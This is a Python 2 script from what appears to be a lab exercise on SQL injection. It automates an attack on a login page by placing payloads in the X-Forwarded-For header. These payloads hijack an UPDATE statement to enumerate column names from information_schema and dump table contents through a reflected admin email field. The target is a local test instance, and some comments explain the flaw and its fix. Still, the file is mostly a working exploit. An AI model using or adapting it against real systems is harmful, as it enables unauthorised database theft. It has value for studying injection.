参考实验:http://www.hetianlab.com/expc.do?ce=572fa9e9-7eb1-4928-bfe3-eaa444eab1e0
sqlupdateattack.py
#!/usr/bin/python
# -*- coding: utf-8 -*-
import HTMLParser
import urlparse
import urllib
import urllib2
import cookielib
import string
import binascii
import re
import time
#截取字符串中startStr,endStr中间的值
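def GetMiddleStr(content, startStr, endStr):
    """Return the shortest text between the first ``startStr`` and the following ``endStr`` in ``content``.

    Both delimiters are treated as literal text: they are escaped before being
    placed in the pattern, so a delimiter such as ``'.'`` or ``'('`` no longer
    behaves as a regex metacharacter.  The search spans line breaks.

    Returns:
        The captured text, or ``None`` when the pair of delimiters is not found
        (the original fell off the end of the function, which is the same value
        but easy to overlook at the call site).
    """
    # re.S lets the captured value contain newlines; the lazy (.+?) stops at the
    # first endStr after startStr.
    pattern = re.compile(r'%s(.+?)%s' % (re.escape(startStr), re.escape(endStr)), re.S)
    match = pattern.search(content)
    if match is None:
        return None
    return match.group(1)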
#跑表数量
def count(table_name, mode):
    """Build the header payload that makes the lab's UPDATE store a row/column count in the admin email.

    ``mode == 0`` counts the columns of ``table_name`` in information_schema
    (the table name travels as a ``0x`` hex literal); any other mode counts the
    rows of the table itself.  ``testuser`` is read through a derived table
    because the UPDATE this payload lands in modifies that same table (see the
    module comment above sql_users).
    """
    head = "1.1.1.1',email=("
    tail = ") where username='admin'#"
    if mode == 0:
        hex_name = binascii.b2a_hex(table_name.encode("utf8"))
        inner = ("select count(COLUMN_NAME) from information_schema.columns "
                 "where table_name=0x" + hex_name + " and table_schema=database()")
    elif table_name == 'testuser':
        inner = "select count(*) from ( select * from testuser) as x"
    else:
        inner = "select count(*) from " + table_name
    return head + inner + tail
#跑表的列名用到的sql注入语句
def sql_column(table_name, num):
    """Build the header payload that reads the ``num``-th column name of ``table_name`` into the admin email.

    The table name is sent as a ``0x`` hex literal; ``limit num,1`` returns a
    single information_schema.columns row per request, so the caller loops
    over ``num``.
    """
    hex_name = binascii.b2a_hex(table_name.encode("utf8"))
    query = ("select COLUMN_NAME from information_schema.columns "
             "where table_name=0x" + hex_name + " limit " + str(num) + ",1 ")
    return "1.1.1.1',email=(" + query + ") where username='admin'#"
#跑表的内容
def sql_data(table_name, column, num):
    """Build the header payload that reads one cell, ``column`` of the ``num``-th row of ``table_name`` ordered by ``id``, into the admin email."""
    query = "select %s from %s order by id limit %s,1" % (column, table_name, num)
    return "1.1.1.1',email=(%s) where username='admin'#" % query
#跑表的内容(与update所用表(即演示中的testuser表)冲突使用)
def sql_users(column, num):
    """Build the header payload that reads ``column`` of the ``num``-th testuser row (ordered by ``ID``) into the admin email.

    Counterpart of sql_data for the table the lab's UPDATE itself writes to
    (the module comment above calls it the conflicting table): the rows are
    read through a derived table ``( select * from testuser) as x`` rather
    than from testuser directly.
    """
    parts = [
        "1.1.1.1',email=(select ", column,
        " from ( select * from testuser) as x order by ID limit ", str(num),
        ",1) where username='admin'#",
    ]
    return "".join(parts)
#注入,先模拟登陆后截取结果并写入文件
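def inject(posturl, sql):
    """Log in to ``posturl`` as admin with ``sql`` in the X-Forwarded-For header and return the reflected email value.

    Judging by the payloads built by count/sql_column/sql_data/sql_users and
    the module comments, the lab application copies the X-Forwarded-For value
    into an unparameterised UPDATE on login; the payload closes the quoted
    value and rewrites the admin email, which the page then reflects after
    ``your email is:``.  On the server side a parameterised statement (and not
    trusting X-Forwarded-For as an IP source) removes the flaw.

    Note: the original module comment says the result is written to a file;
    nothing here writes a file — the value is only returned.

    Returns:
        The text between ``your email is:`` and ``</font><br>``, or ``None``
        when that marker is absent from the response body.

    Raises:
        Exception: with a ``weberror`` message when the request or the read of
        the response fails.  The underlying error text is kept in the message
        instead of being discarded as before.
    """
    cookie_jar = cookielib.CookieJar()
    opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cookie_jar))
    headers = {
        'User-Agent': 'Mozilla/5.0 (Windows NT 6.3; rv:36.0) Gecko/20100101 Firefox/36.04',
        'X-Forwarded-For': sql,
    }
    post_data = urllib.urlencode({'uname': 'admin', 'passwd': 'admin', 'submit': 'Submit'})
    request = urllib2.Request(posturl, post_data, headers)
    try:
        response = opener.open(request)
        try:
            body = response.read()
        finally:
            # Always release the connection, even if the read fails.
            response.close()
    except Exception as err:
        # Same exception type callers saw before, but with the cause preserved.
        raise Exception('weberror: %s' % err)
    # No builtin shadowing here (the original bound the body to ``str``).
    return GetMiddleStr(body, 'your email is:', '</font><br>')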
if __name__ == '__main__':
    # NOTE(review): the original file's indentation was lost; the nesting below
    # is reconstructed from statement order and should be confirmed against the
    # source file.
    # Target of the referenced lab exercise (a local test instance).
    posturl = 'http://127.0.0.1/test/index.php'
    table_name=['testuser', 'test1']
    # First enumerate each table's column names into the temporary column_name list.
    # NOTE(review): column_name is created once and never cleared, so while
    # processing the second table it still holds the first table's columns —
    # confirm this is intended.
    column_name=[]
    for table in table_name:
        # count(table, 0) asks for the column count; inject() returns it as text.
        sql_count=inject(posturl,count(table,0))
        print table+":\r\n"
        for num in range(int(sql_count)):
            sql=sql_column(table,num)
            try:
                m=inject(posturl,sql)
                column_name.append(m)
            except TypeError:
                # NOTE(review): inject() re-raises every failure as a plain
                # Exception, so this TypeError handler is unlikely to fire — confirm.
                print 'error'
        print column_name
        # Then dump the matching data, one cell per request.
        for column in column_name:
            print table+"|||"+column+":"
            # count(table, 1) asks for the row count; it is re-queried per column.
            for num in range(int(inject(posturl,count(table,1)))):
                if table=='testuser':
                    # testuser is the table the UPDATE modifies, so it is read via sql_users.
                    sql=sql_users(column,num)
                else:
                    sql=sql_data(table,column,num)
                m=inject(posturl,sql)
                print m
            print "\n"